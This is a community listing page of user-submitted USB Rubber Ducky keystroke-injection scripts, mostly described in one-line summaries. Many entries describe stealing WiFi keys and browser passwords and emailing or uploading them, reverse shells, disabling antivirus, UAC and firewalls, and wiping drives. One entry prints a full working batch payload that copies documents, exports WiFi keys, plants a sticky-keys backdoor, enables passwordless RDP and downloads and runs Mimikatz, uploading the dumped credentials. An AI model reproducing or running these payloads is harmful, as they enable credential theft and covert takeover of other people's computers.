User Scripts
These are community submitted scripts. You can load the script in to the encoder by clicking the row.
Ducktoolkit.com has not checked the content of these scripts. It is your responsibility to ensure you understand what actions the encoded payloads will perform before use.
| Script Name | Author | Description | Tags | Created |
|---|---|---|---|---|
| Hello World | @hak5darren | Simple payload to test a ducky on windows | hello world | 2016-10-10 08:30:16.710000 |
| WiFi password grabber | Siem | Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. Change the following things; ACCOUNT: Your gmail account PASSWORD: Your gmail password RECEIVER: The email you want to send the content of Log.txt to If you are using GMAIL you have to tell GMAIL to allow less secure apps to connect to your inbox. You should be able to find the switch in accounts settings. Your other option is to use one of the API codes with two-factor that GMAIL gives you. | wifi, password, windows | 2017-01-03 09:30:07.287000 |
| Info gathering Ubuntu 1.0 | Captain_Harlock | The following script is an information gatherer script which collects info from a running Ubuntu OS and saves it to a file named "info_gathering.txt". The info that the script retrieves is the logged in username, the distribution and kernel version of the running system, the applicability of the shellsock bug, the mounted filesystems, information which is related to the Network adapters, availability of development tools (python, g++), contents of the hosts file and the listening TCP/UDP connections. Apart from that it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files. | ubuntu,report, info | 2016-10-10 09:12:57.434000 |
| Reboot system | Drogo | REBOOT system | Reboot | 2016-10-19 21:15:21.661000 |
| HotDog Background | Anon | Sets Desktop background as hotdog | 2016-12-24 18:11:56.868000 | |
| Metasploit Powershell Payload | Dj Saitto | Metasploit payload, powershell payload. To preform this you need to startup metasploit framework and using the handler Script Web Delivery. wiki: https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery Set the target as Powershell, generate the scrript and set it as a string inside the binary file. More questions and tricks, https://www.facebook.com/Problemet | Metasploit Powershell Exploit | 2016-10-22 13:06:17.636000 |
| Thermostaten | Keld Norman | Load windows 98 install screen | Joke fun windows98 | 2016-10-24 13:57:21.354000 |
| Wallpaper Prank v2.0 | ChuckMoe | I decided to pick up one of the first Payloads, the Wallpaper Prank and modify it a bit. It does the same thing as the old Wallpaper Prank except for the fact that it flips the image and your Screen. The Desktop now looks the same as before but the movement of the mouse is inverted. | Desktop, Wallpaper, Flip, Windows | 2016-11-06 21:52:51.774000 |
| Save WiFi info to USB | RickyCee23 | Target: Windows 7/10 This will grab the WiFi details and password that the computer is connected to. The password grab is from Thecakeisgit and Siem originally, but this will save into your USB of your choice. When put into the Encoder, feel free to delete the REM notes. Got any questions, concerns, problems, and revisions, email me at richardoc.2009@hotmail.com | Wifi Grab, USB, Windows | 2016-11-06 23:37:07.234000 |
| WiFi Credentals to Duck | ZILF | WiFi Credentals to Duck Duck needs to be in twin duck mode No PowerShell needed Tested on win 8/10 | WiFi Credentals, Twin Duck, Windows | 2016-11-07 06:42:44.435000 |
| PIXLE | SAM RAFIEI | when pluged into a mac, it will create a folder called .OSXhelper and create a .sh file called helper.sh, which will give u a netcat shell, before using this make sure u listen on the port u chose, LINUX: nc -l -p port, MAC: nc -l port. you will get a shell and from there u could upload a python backdoor using curl and exploit the target using metasploit. | 2016-11-10 02:40:52.825000 | |
| lagrange | lagrange | normal | 2016-11-10 10:29:04.901000 | |
| Payload - User Password Grabber | Rivan Juthani | This scrip takes user passwords and user information and email it to rubberduckyhacking@gmail.com, this is made by Rivan Juthani on 11-11-2016 | 10:34pm | 22:34 | Password, Grabber,Password Grabber, Payload | 2016-11-11 17:05:15 |
| Hard Drive Wipe | StewMan | figure it out lul jk but this SHOULD delete everything on the targets primary drive | prank,idk,not a good prank,lol | 2016-11-21 04:05:42.239000 |
| Meme Database | llxw | memes,database | 2016-11-21 15:24:50.735000 | |
| Download/Exec (works with proxy ) | dirtybit | Download and Execute through the configured system proxy | 2016-11-25 17:40:33.541000 | |
| UAC Administrative CMD Prompt | B0rK | Opens an Administrative Command Prompt in Windows with UAC Enabled | 2016-11-29 19:38:47.471000 | |
| Aaron | organising | Disable windows defender. You may need to change the times depending on the pc. | 2016-12-06 21:49:14.792000 | |
| Disable Windows Defender | organising | Disable windows defender, you may wanna change timings depending on the computer you're running it on. | 2016-12-06 21:50:28.454000 | |
| homepage change | bot126 | Opens chrome, changes the homepage to pornhub and then closes. | pornhub | 2016-12-07 11:04:00.799000 |
| 2016-12-07 13:46:03.175000 | ||||
| Hak5Darren | Hak5Darren | Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. | exfiltrate, twin duck | 2016-12-07 23:17:29.510000 |
| Exfiltrate Documents to USB Storage | Hak5Darren | Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. | exfiltrate, twin duck, mass storage | 2016-12-07 23:18:29.364000 |
| Chrome pass 30 sec GMAIL | Hazael | BASIC PAYLOAD CHROME TO GMAIL 30 SEC USING PAGES IN THIS PAYLOAD Https://www.base64encode.org/ -Convert text: start pass.exe / stext "name of text file whitout" ".txt -To "c3RhcnQgcGFzcy5leGUgL3N0ZXh0IFNzYXAudHh0" -if u edit or rename just use agin the page Convert text to bat so fast * -It is necessary to execute the command "start pass.exe /stext file " -READ ABOUT http://www.nirsoft.net/utils/web_browser_password.html Payload mrgray's rubber hacks * Https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mrgray%27s-rubber-hacks -http: //www.mediafire.com/? Nm1c62qt9w9z3wg -WebBrowserPassView.exe -> went to the "mediafire" page to get a direct link. SMTP CODE GMAIL DEL BAT -TXT -EXE DEL REGISTER -This payload is basic, you need to modify it to run hidden, or add some command that deletes the files from the recycle bin. (idk if it exist ) -Change the directory(I tried but I have problems) - -Check the keyboard, I have no problems with the US but in "ES" i have a lot Pdt: Any suggestion, or solution would appreciate contact me to: dprsirdpr@gmail.com REM BAT FILEMAKE IT IN TXT start pass.exe /stext Ssap.txt | Basic payload | 2016-12-10 04:00:24.788000 |
| Rick Roll | thebabbylord | Opens never gonna give you up by Rick Astley on the computer at full volume. For use on mac computers. you can change the url to make it a different video. | mac,prank | 2016-12-11 02:09:56.225000 |
| CMD Windows 10 UAC | T-DaWg | Open Command prompt with amdin rights in Windows 10 with UAC | cmd windows10 uac | 2016-12-14 18:19:30.104000 |
| the0bone | the0bone | Leave a YouTube Channel Subscription | YouTube, fun | 2016-12-16 09:08:54.784000 |
| OSX Hidden Files | PLO | OSX View hidden files quick modification | OSX , FINDER Mod | 2016-12-17 15:56:46.821000 |
| TwinPayload | OrangeGreen | Just Some Fun. Twin Ducky Only. | 2016-12-18 22:31:25.916000 | |
| List files in green in CMD | @iAm_EMT | Made to spook my brother. | 2017-01-02 05:26:30.439000 | |
| Wallpaper Prank 3 | DKO3030 | Download an image from the internet and set as the wallpaper. This script works but could be improved. | Wallpaper, Powershell, Windows | 2017-01-02 23:53:59.031000 |
| SHUTDOWN PC | C.L.A.W | shutdown a PC :) | 2017-01-03 23:03:32.039000 | |
| Windows 8/10 Magic Computer | Flajt | Windows 8/10 Background Change Script with "talking Computer". Please modifiy it how you like it. My idea is that the "computer talk" and at the same time the script change the background without the users knowledge. Maybe you get it work. (Sorry for bad english) | windows 8,windows,windows 10,Windows,Magic Computer | 2017-01-05 16:50:15.256000 |
| Voice Output Windows 10 prank | Flajt | This script launch the Windows 10 voice output. Maybe it work on Windows 8 and 8.1 It activate it permantly i don`t know if it survive reboots so tell me pleas and have fun with it. | Windows, Windows 10,windows,windows 10, Voice Output,prank, | 2017-01-05 19:21:22.786000 |
| Voice Output Windows 10 prank | Flajt | This script launch the Windows 10 voice output. Maybe it work on Windows 8 and 8.1 It activate it permantly i don`t know if it survive reboots so tell me pleas and have fun with it. | Windows, Windows 10,windows,windows 10, Voice Output,prank, | 2017-01-05 19:42:57.899000 |
| THE MATRIX | THEDON101 | THIS IS MI FIRST SCRIPT MADE IM 16 AND I HAVE A ARDUINO BAD USB.... THIS SCRIPT MAKE A .BAT FILE TO UR DESKTOP CALLED "TRIX" AND WHEN U CLICKE IT THE CMD PUPS UP AS THE MATRIX. YEAH II KNOW ITS SIMPLE BUT ITS FUN. I KNOW A LOT OF DELAYS LOL CONTACT IF ANY TRUBLE: afapontem@gmail.com | BAD USB MATRIX | 2017-01-06 05:50:06.109000 |
| *NO DOWNLOAD* BACK GROUND PRANK V11111111111 | THEDON101 | THIS IS MY 2ND DUCKY SCRIPT. IT CHANGE THE BACK GROUND TO HIGH CONTRAST COLORS. FEEL FREE TO MOD IT *NO DOWNLOAS* | WIN 10, HIGH CONTRAST 2 | 2017-01-06 07:29:55.019000 |
| WIndows 10 Admin | Flajt | The Script create a Windows Admin account under WIndows 10. But at I try it it doesnt work at the point were i mark in the script if you know why send me a mail at matrimkurz@gmail.com | windows,windows 10,admin | 2017-01-07 15:22:34.676000 |
| InSecure | InSecure | Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 10 - | syskey, InSecure, windows, reboot | 2017-01-07 16:42:40.784000 |
| Syskey with reboot | InSecure | Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 7 and 10 - | syskey, InSecure, windows, reboot | 2017-01-07 16:44:54.390000 |
| *** NEW!!! *** Syskey with reboot | InSecure | Set syskey with the password "password" and reboot Windows UAC must be completely disabled!!! - Tested on Windows 7 and 10 - | syskey, InSecure, windows, reboot | 2017-01-07 17:12:47.582000 |
| Windows 10 shutdown loop | Flajt | This script will shutdown a windows user for ever. It create a .bat file that copy itself to the startup folder then the rubber ducky open cmd and start the run.bat (name of the .bat) and then the pc will shoutdown immediately. I dont know if it works the first part correct but i dont know if it run after a reboot. So pls digure it out and write it at the commants below. You use it on your on risk!!! | windows 10,shutdown,loop,batch,"prank", | 2017-01-08 15:13:20.951000 |
| Windows 10 shutdown loop | Flajt | This script will shutdown a windows user for ever. It create a .bat file that copy itself to the startup folder then the rubber ducky open cmd and start the run.bat (name of the .bat) and then the pc will shoutdown immediately. I dont know if it works the first part correct but i dont know if it run after a reboot. So pls figure it out and write it at the commants below. You use it on your on risk!!! | windows 10,shutdown,loop,batch,"prank", | 2017-01-08 15:33:24.567000 |
| Password web-browser | Valentin SARRE | This script allows you to steal web browsers passwords ans send the results by emails. | Steal Web Browser password | 2017-01-12 08:58:07.175000 |
| Widows 10 Admin (work) | Flajt | This Script creates a Admin user with the name Phoenix and Password TeSter. | windows 10, Admin | 2017-01-18 10:55:12.682000 |
| Interface scan (OSX and Debian-based OSes) | Grim | This is just a simple utility to run an ifconfig and an iwconfig on a computer's network interfaces, then it uploads the files to a FTP server and deletes the local files afterwards. There are spots where you need to enter your own credentials but they are highlighted. There are also places to comment out or uncomment lines of code depending on the target OS (which are also highlighted). Thank you for your time and consideration and I hope you enjoy the script. :) | Mac, Linux, FTP, network | 2017-01-22 06:30:17.410000 |
| Quick install of Windows 98 - Prank | vincent | Opens chrome and goes fullscreen on fakeupdate.net to make the impression that you rekt their computer by installing windows 98 on it. Don't use on your boss computer because he will go to the helpdesk and they will find you... | Prank | 2017-01-24 20:26:25.305000 |
| Fake update - win10 | judge2020.com | Will bring up the fakeupdate.net page for windows 10 and fullscreen it. great for going around best buy/walmart by judge2020 - website judge2020.com | prank | 2017-02-02 15:35:31.650000 |
| v_ | vulc_ | OSX backdoor -> reverse shell Not tested yet, since I am waiting for USB Rubber Ducky. Original bash script was found on http://patrickmosca.com | osx,backdoor,shell | 2017-02-02 23:10:41.765000 |
| OSX backdoor -> reverse shell | vulc_ | OSX backdoor -> reverse shell Not tested yet, since I am waiting for USB Rubber Ducky. Original bash script was found on http://patrickmosca.com | osx,backdoor,shell | 2017-02-02 23:12:42.476000 |
| Data stealer | @s4m0r | This script will extract system information, all stored wifi profiles with passwords and also all currently running processes. It's written to work with the twinduck firmware. It requires this additional .bat file for the wifi profiles. Save it in the root of the ducky @echo off setlocal enabledelayedexpansion (for /f "tokens=2 delims=:" %%a in ('netsh wlan show profiles ^| findstr "Profile"') do ( set str=%%a set str=!str:~1! echo !str! )) >networks.txt | recon,stealer | 2017-02-03 22:51:14.481000 |
| Online Passwords and User Hashes | Raiden | Uses the twin duck software to steal a list of online passwords and dumps user login hashes. They are stored on the rubber ducky. Requirements: Usb rubber ducky must be named 'D' WebBrowserPassView named 'p' stored on the ducky fgdump named 'f' stored on ducky | password, hash, twin | 2017-02-09 03:01:00.919000 |
| test | test | test | test | 2017-02-14 22:04:48.504000 |
| "Ultimate" Windows Backdoor | Apex_1337 | This Code: - opens admin cmd - bypass uac - create a backdoor -> pressing 5 times shift to get admin cmd, also working on login screen - enable RDP - disable uac by registry - disable windows firewall | Apex_1337, windows, reboot, admin, cmd, command, prompt, backdoor, rdp, remote, desktop, protocol, program, firewall, uac, registry, bypass | 2017-02-20 01:31:15.839000 |
| Become a Domain Admin | StinkyBliss | This is a basic script to create a user account and make it a domain admin. there is no obfuscation though you may add some. I wrote this script for testing purposes only. It has been successfully tested on Servers 2012 R2 and 2016. | 2017-02-24 05:02:44.726000 | |
| Disable Windows Defender WIN 8 & 10 | mwatt | This script will work in both win 8 and 10 to disable windows defender. Some keystrokes are dead in win 10, since they are meant for win 8 and vise versa. I left long delays for development. Happy Hunting! | 2017-02-26 03:07:46.068000 | |
| Wifi and password involuntary backup | Kasamuri @Philipp15055 | Its a Small script that involuntary backs up all Online Passwords and wifi credentials http://www.nirsoft.net/password_recovery_tools.html (WebBrowserPassView.exe renamed to p.exe) and Twin duck volume named to D is required to function right) Delays might need to be adjusted for your pc iam working to improve the shorting of dada and adding some more data to me involuntary backed up | Windows, WIFI, Online, Web Browser, | 2017-03-01 19:48:18.420000 |
| Firefox Password Snatcher | WhereItsAt | Copys saved google account password from firefox, bypasses UAC to save it to a text file and then emails it via powershell to a gmail account Firefox Version: 51.0.01 OS: Windows 7 | firefox, windows7, password, stealer | 2017-03-02 13:49:21.519000 |
| Firefox Password Snatcher | WhereItsAt | Copys saved google account password from firefox, bypasses UAC to save it to a text file and then emails it via powershell to a gmail account Firefox Version: 51.0.01 OS: Windows 7 | firefox, windows7, password, stealer | 2017-03-02 13:50:27.700000 |
| WiFi-Harvester -> Mail | imp.so | Saves the SSID, Network type, Authentication, Encryption and the password slightly invisible to A.txt and emails the contents of A.txt from a gmail account. After that it deletes the A.txt and the "Run-History". Works on german localized systems only. Change the following things; SENDER-MAILADRESS: Your gmail account SENDER-PASSWORD: Your gmail password RECIEVER-MAILADRESS: The email you want to send the content of A.txt to If you are using Gmail you have to tell Gmail to allow less secure apps to connect to your inbox. You should be able to find the switch in accounts settings. Your other option is to use one of the API codes with two-factor that Gmail provides you. If you are getting in trouble with anything, try a higher delay or insert a new one before the line that fails. | wifi, credentials, harvest, mail, windows, german | 2017-03-06 19:24:43.307000 |
| PWN in one - PDF's PW's & RDP | Mwatt | ***Modified:*** Exfiltrate documents to Twin Duck USB Mass Storage as shown on Hak5 episodes 2112, 2113 and 2114. Requires files on drive listed in show notes and WebBrowserPassView.exe (renamed as p.exe) get the version that allows command line execution. Mods below are only to inject.bin and e.cmd. Script now includes in e.cmd: Apex_1337's RDP activation script Mubix, Clymb3r, Gentilkiwi - mimikatz 15 second script Kasamuri @Philipp15055's involuntary backup of passwords and SSID codes Export of ifconfig and external ip address. ***I also added an undo.cmd script below to reverse the RDP registry changes to help while testing (must be run as admin)**** ***Props listed below*** d.cmd and i.vbs are in HAK5 show notes (they have not been updated for this script) REM ************** Start e.cmd*********************** REM Start of Updated e.cmd (need to update locations of im.ps1 and rx.php in brackets, sans the brackets) @echo off @echo Installing Windows Update REM Combo e.cmd for staged payload -Mwatt REM Mad props to (I tried to collect all the names for each script): REM Diggster, Midnightsnake REM HAK5Darren for pulling together the staged payload for the show and for mimikatz script REM Mubix, Clymb3r, Gentilkiwi for 15 second mimikatz script REM Apex_1337 for the RDP script REM Kasamuri @Philipp15055 for the WebBrowserPassView & netsh wlan script REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set hh=%time:~0,2% set hh=%hh: =0% SET CURRENT_DATE=%date:~4,2%%date:~7,2%%date:~10,4%_%hh%%time:~3,2%%time:~6,2% set dst=%~d0\slurp\%COMPUTERNAME%_%CURRENT_DATE% mkdir %dst% >>nul mkdir %dst%\wifi >>nul mkdir %dst%\ip >>nul if Exist %USERPROFILE%\Documents ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul REM Same as above but does not create empty directories xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul ) netsh wlan export profile key=clear folder=%dst%\wifi ipconfig > %dst%\ip\local_ip.txt nslookup myip.opendns.com. resolver1.opendns.com > %dst%\ip\ext_ip.txt REM run WebBrowserPassView.exe (renamed as p.exe) get version that allows command line commands REM Windows defender may detect p.exe file on USB usually after ~20 seconds, so unplug quickly or disable in inject.bin. %~d0\p.exe /stext %dst%\pws.txt REM **** below lines require run as admin (modifed inject.bat to insert lines to open CMD as admin and run same powershell line in original inject.bin) REM enable rdp reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f REM allow to login over rdp without password reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "LimitBlankPasswordUse" /t REG_DWORD /d 1 /f REM login backdoor press 5 times shift to get command prompt reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f REM disable windows firewall netsh firewall set opmode disable REM disable uac reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f REM Download and execute Invoke Mimikatz then upload the results powershell "IEX (New-Object Net.WebClient).DownloadString('[location of im.ps1]'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('[location of rx.php]', $output)" @cls @exit REM end of e.cmd REM ************************************************ REM ****************start undo.cmd******************** REM start of undo.cmd script to reverse the RDP changes for testing (must be run as admin) REM Turns off "enable rdp" reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "TSEnabled" /t REG_DWORD /d 0 /f REM Turns off "allow to login over rdp without password" reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v "LimitBlankPasswordUse" /t REG_DWORD /d 0 /f REM Turns off "login backdoor press 5 times shift to get command prompt" reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f REM Turns off "disable windows firewall" netsh firewall set opmode enable REM Turns off "disable uac" reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 1 /f | 2017-03-13 21:42:31.359000 | |
| Download and execute with admin rights | LionSec / @lionsec1 | Download files from the internet and execute with admin rights using powershell. For example , if you use a metasploit backdoor , you will directly have administrator rights. ".hidden-directory" = where the downloaded file(s) will be stocked "website-url" = your website host or IP address (e.g example.com or 192.168.1.155) "filename" = Name of your program | download,admin,execute,powershell,metasploit,hidden | 2017-03-19 18:15:36.370000 |
| e | dasta | Sony | 2017-03-20 09:04:48.690000 | |
| Password and Network Config Grabber | HexHax | extracting browser passwords and sending them to an account on drivehq.com via ftp make a free account at drivehq.com edit the script with your drivehq username and password enjoy someones passwords download webbrowserpassview.exe from nirsoft website upload webbrowserpassview.exe from nirsoft website that you downloaded to the drivehq opens a command prompt as an administrator, moves window to the bottom of the screen, then makes a directory in the C: drive, runs ipconfig and saves it to a txt file, then connects via ftp to drive hp and downloads the password grabber, runs it and saves it to a txt file, sends text file to via ftp to your account, then it cleans itself up and exits, process takes about a minute, may have to adjust delays based on computer and internet performance | Password, Windows, Password Grabber, Network Config Grabber | 2017-03-20 19:49:08.008000 |
| Reconnaissance | HexHax | https://www.drivehq.com/ - head here to make a free account http://www.nirsoft.net/ - head here to download: MyLastSearch.exe ProduKey.exe TurnedOnTimesView.exe UserProfilesView.exe SecuritySoftView.exe WirelessNetView.exe and wul.exe (there are plenty more, just have to find which ones work without popping up their own GUI) http://www.mediafire.com/file/08746vmgjuou7db/BPD.exe - then here to download BPD.exe upload these programs to your drivehq account and then run this script with your username and password to ftp back and forth and get the job done, est. time overall is about 3 minutes and then victim gets rickrolled :) also this script cleans up after itself WARNING - I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS SCRIPT **EDUCATIONAL PURPOSES ONLY** ~HexHax | Reconnaissance, HexHax, Rubber Ducky, Ducky, Excessive Information | 2017-03-22 03:18:01.317000 |
| Free Donuts | JustinSt-Laurent | This will make a user send out an email indicating that they will be buying donuts through Outlook. The purpose was to punish those who did not lock their systems. Change - email@address.com | Outlook | 2017-03-22 16:09:14.536000 |
| Sandstorm Prank | Hukaria | Powershell Sandstorm Prank This is my first Duckyscript, thought i would test the capabilities of scripts within scripts, not really as useful as the other scripts however a good laugh. This script will: - Changes Volume to 100% - Runs Sandstorm - Continuously Locks PC until 31 Seconds have passed - Toggles Locks On/Off - Changes Mouse Clicks - Spams DUDUDU in cmd windows The script can be adjusted to reduce the annoyance level you may cause: -Changing the x variable will change the scripts length (199 seems a reasonable amount and around 750 is the full duration of the song) -All of the oShell.SendKeys("{PGUP}") can be removed to keep the volume the same. -Line 33 can be removed to stop the mouse buttons switching. -Line 41 can be removed to stop the PC auto locking. | Prank | 2017-03-23 23:18:39.331000 |
| Ducky Admin | HexHax | Make yourself an admin on someones computer (only works if the user is an admin on the computer you want to be admin on) example would be your friends personal computer replace [USERNAME] & [PASSWORD] with your username and password | Admin, Ducky Admin, Duck, User Account | 2017-03-24 05:08:00.992000 |
| hyWse | hyWse_ | Opens CMD w/ Admin-Rights | cmd, admin | 2017-04-04 14:27:13.545000 |
| yt sub and like | Nalon | Subscribe and like your video replace the were it says "LINK TO THE VIDEO YOU WANT LIKED" to the video url and where it says "YOUR CHANNEL ID" replace it with your youtube channel id | 2017-04-06 16:45:03.753000 | |
| YT SUB N LIKE | Nalon | Subscribe and like your video replace the were it says "LINK TO THE VIDEO YOU WANT LIKED" to the video url and where it says "YOUR CHANNEL ID" replace it with your youtube channel id | YT,SUB,LIKE,i messed up other one | 2017-04-06 16:48:27.502000 |
| Disable variable AV | mWatt | This is for educational purposes only! Only use on authorized systems. I am not responsible for your actions. The script below will disable some AV, in case you would like to install programs as a sysadmin. Tested on the latest AVG and older symantic versions... Please update if you have other AV's that you can test. | 2017-04-06 20:34:51.835000 | |
| p0wc0w | Grab all wireless networks with the corresponding key, export to csv file and send via email (powershell). Command prompts a bit obfuscated, and powershell hidden to keep screen activity to a minimum. | WiFi Credentals, exfiltrate mail | 2017-04-15 19:56:16.589000 | |
| Tree command "Hackig" Prank | @Ddawg747 | Opens Command prompt, changes to C drive, changes text color to green, clears previous commands, runs tree command | prank, windows, cmd | 2017-04-17 03:51:05.395000 |
| ArchInstallVM | b0n3z | This will install arch linux from the iso to a VirtualBox VM. | 2017-04-22 22:31:08.376000 | |
| gg | 571 | Ducku Duck | gg | 2017-04-27 00:27:25.755000 |
| ducky user linux | Ron4ld0 | This script will add an user called ducky with root permission and the password USBRUBBER (this must be run in a terminal with root permission) | 2017-04-28 14:38:14.136000 | |
| jodiendo wins | tasss | jodiendo wins | win, out | 2017-05-01 04:58:45.472000 |
| AutoRun any Program on a shared drive Windows 10 | thecurisouscouch | AutoRun any Program on a shared drive Windows 10. (I was installing Revit 2017 off our server, use your own path in the single quotes) | 2017-05-03 18:03:22.022000 | |
| Little Worm | BlackBoot | This program executes a for statement that goes one by one and for each item in the list executes the Start command. The greater the last number in the list, the more the Start command will be executed and the computer will be locked. Tested on Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10. Author: BlackBoot. | Windows, Worm | 2017-05-09 18:10:57.909000 |
| rfkill 0 & rfkil 1 | spyder @TRIsecHackers | Hello this is my first public script so judge i could give a few words left | 2017-05-22 01:46:57.291000 | |
| Matrix V2 | Harvey | This is a script that will launch a matrix cmd. This is also a updated version of THEDON101 script so most of the credit goes to him :) plus i haven't actually tried this script myself as my rubber ducky broke :( so plz tell me if it doesn't work in the comments :) enjoy! | matrix updated version | 2017-05-22 21:50:56.593000 |
| USB Intruder | B0rk | USB Intruder for TwinDucky Requirements - Download the USB_Intruder payload from the Hak5\BashBunny github repo and delete the payload.txt. Copy the rest of the USB_Intruder contents to the Ducky's storage and use the following for the inject.bin **Delays will need to be adjusted to suit the hardware used in testing** | USB Intruder | 2017-05-24 22:08:13.649000 |
| $NFT Windows Crasher | Jonny Banana | A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability $MFT is used by NTFS systems to manage some metadata. This fallace has recently been discovered, which has not yet been closed. Works on windows 7, 8 and vista, dont work on windows 10. I think work on Xp and earlier. This Script dont require any special firmware on the Rubber Ducky (TwinDuck Firmare etc.). The system crash lasts until the machine is switched off, or until the blue screen of death appears;) A system crash demonstration using the two strings with the following paths: c:$MFT & c:$MFT\123 can be found here: https://www.youtube.com/watch?v=vYL9UQRwUZc&t=6s you can fiind this and other Rubber Ducky SCripts on my Github: https://github.com/JonnyBanana/-MFT-Duck-Crasher https://github.com/JonnyBanana or on My Youtube Channel https://www.youtube.com/channel/UCGpltr2aMuNZqfBN6y51kCw Enjoi it!!! | crash windows, windows 7, windows vista, windows 8, crash, | 2017-05-31 03:24:52.419000 |
| f | f | f | f | 2017-05-31 14:11:32.069000 |
| Hot Dog Background FR | Manzvador | Hot Dog Background for french language | hot,dog,fr,french,fond,ecran,background | 2017-06-10 10:38:20.789000 |
| insequrities | This script does a lot, but has some huge key features which are worth going over. It displays the current WiFi Connections credentials by exploiting the * character in Command Prompt, which acts as "everything". So in this script we are using the * in netsh wlan show profile name=* key=clear Thus, regardless of the access points name, so long as its wifi it will display the key(password) Another thing we are "exploiting" is the ability to copy command prompts output, and sending it via SMTP through Powershell. The Notepad file which will copy all of command Prompts output is located in the windows temp folder (C:\Windows\Temp\XInfo.txt) which is a relatively common location, but also not often looked through. Another thing this script does is display open ports on the computer. But we don't really need to go in depth on that Finally the script creates an access point with the credentials ssid=Insecure key=Insecurities then drops the windows firewall, if not already dropped. This script is sort of buggy and very slow at the moment because its still in testing, but feel free to modify it so that it's functional to your liking | wifi pass grab,email report | 2017-06-16 02:06:53.911000 | |
| Windows93 Prank | Arkie | A funny prank to pull on coworkers and friends it makes them think their computer is running a windows 93. It takes the computer to the windows93 web page and puts web browser in full screen making it look real. | 2017-06-29 16:31:06.798000 | |
| Windows93 Prank | Arkie Pierce | A funny prank to pull on coworkers and friends it makes them think their computer is running a windows 93. It takes the computer to the windows93 web page and puts web browser in full screen making it look real. | 2017-06-29 16:33:53.044000 | |
| Rick Roll | Frank the spaghetti man | Rick Roll wallpaper change and play youtube video never gonna give you up in full screen. If you run into any bugs try extending the delays. You can also add in a max volume function. Must have internet connection to work. Works in Windows 10. I found a partial script online to change wallpaper and began editing it. Most information was found by being a proficient Googler and using the github and hak5 forums. | 2017-07-21 19:05:41.256000 | |
| DarkN3ss | jLynx_DarkN3ss | Blue Screen of Death! Only works on Windows 7 and earlier. | BSOD, Blue Screen of death | 2017-07-30 21:40:12.283000 |
| Hello World | gsgsh | Hello World | Hello World | 2017-07-30 22:48:22.151000 |
| test 3245 | @tset575 | test 3245 | test 3245 | 2017-07-30 22:53:01.946000 |
| KUBUNTU Multi-Desktop | @Ted Saari | Creates multiple desktops in KUBUNTU and then restores back to normal. | KUBUNTU, LINUX, UBUNTU | 2017-08-04 19:57:03.156000 |
| Text to voice | @theoisle | This script was tested on Windows 7. It uses the text to speech feature and use the selected voice to say "This is a test of the emergency broadcast system." | text to voice, speech | 2017-08-05 02:37:51.355000 |
| Win 7 Media player | @theoisle | Tested in Windows 7. Opens media player and plays the "ding.wav" several times and then loads flourish.mid and plays it repeating until you type a CRT+T. | Windows 7, Media Player, Music Player, Sound Player | 2017-08-06 21:04:10.407000 |
